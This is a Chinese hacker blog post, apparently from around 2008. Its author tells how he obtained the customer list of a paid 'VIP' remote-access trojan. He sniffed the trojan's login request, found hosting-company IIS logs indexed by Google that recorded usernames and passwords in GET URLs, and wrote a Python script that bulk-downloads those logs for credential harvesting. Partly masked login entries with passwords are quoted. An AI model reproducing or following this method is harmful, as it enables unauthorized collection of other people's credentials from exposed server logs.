万网虚拟机漏洞黑客获得VIP木马所有会员

昨天群里看到某牛发布某VIP木马所有VIP用户的数据库。。。

　　想起来偶以前拿了另一个VIP马过程，心里痒痒，打算试试。

　　上次拿了那个VIP马会员用了WHOIS拿的，不小心公布了出去，结果木马作者直接重新生成了所有用户。
　　经验教训，这次拿到了绝对不能公布。

　　这次的VIP验证和灰鸽子的大同小异，都是把用户名密码扔到验证服务器，验证后下载服务端。

　　所以会发送用户名密码出去。

　　监听本地通讯，得到地址http://xxx/ip/20071125xxxx.asp?user=kxlzx&pass=kanhenmekan!&version=1.0

　　如果验证成功，返回一个EXE文件。

　　可以得到信息：

　　1，HTTP协议

　　2，GET方式提交数据

　　GET数据也就是说，IIS会把日志记录下来，日志里会有密码。。。

　　类似于：

20080126-00:47:40 66.249.xxx 200http://xxx/ip/20071125xxxx.asp user=kxlzx&pass=kanhenmekan!&version=1.0
20080126-00:54:02 66.249.xxx 500http://xxx/check.asp |-|ASP_0113|脚本超时 181578 
  
　　当然之前并不知道居然能拿到日志。

　　获取了验证文件地址后，在google搜索该木马的域名，居然搜到了万网的日志记录。。。。无语。。。

　　注意记录的格式：

20080218-00:41:05 124.132xxx 200http://www.xxx ...... 218.19xxx 200http://www.xxx/ip/20071026Psxxx.asp user=jeffrey8273&pass=fedoracore... cn-22.hichina.com/asplog/log20080218.txt - 38k - 网页快照 - 类似网页

20080220-00:37:26 194.110xxx 200http://www.xxx......http://www.xxx/ip/20071026xx.asp user=kalaam&pass=ne
|-|ASP_0113|脚本超时107125 ...
cn-22.hichina.com/asplog/log20080220.txt - 38k - 网页快照 - 类似网页

这里：cn-22.hichina.com/asplog/log20080220.txt

　　cn-22.hichina.com是万网的服务器，log20080220.txt 是日志地址。

　　明明验证的服务器不再万网，这个日志为什么记录了vip木马的用户呢?

　　推测是这样的，该VIP用户验证服务器曾经放在万网，被记录下来了。而万网有着良好的保存日志习惯。
　　既然里面有VIP用户，就不客气了，python写了个脚本，抓他们。

以下是引用片段： import urllib  month=1  while(month<7):  day=0  while(day<32):  tmp = ’’+str(month)+str(day)  if (len(tmp)==2):  tmp = str(month)+tmp  strtmp = ’http://cn-22.hichina.com/asplog/log20070’+tmp+’.txt’  sock = urllib.urlopen(strtmp)  htmlSource = sock.read()  sock.close()  strpath = ’log20080’+tmp+’.txt’  f = file(strpath, ’w’)  f.write(htmlSource)  f.close()  day=day+1  print tmp  month = month+1

　　PS: 抓到后，按照原来的文件名保存下来。其实也可以用迅雷抓，为什么要用python呢?

　　-_-!这不刚学了python，显摆么。。。。

　　抓下来的文件，拿editplus搜索该域名，得到了N多用户名密码。就不抓图了，免得某些人转载的时候说咱写的东西图太多。。。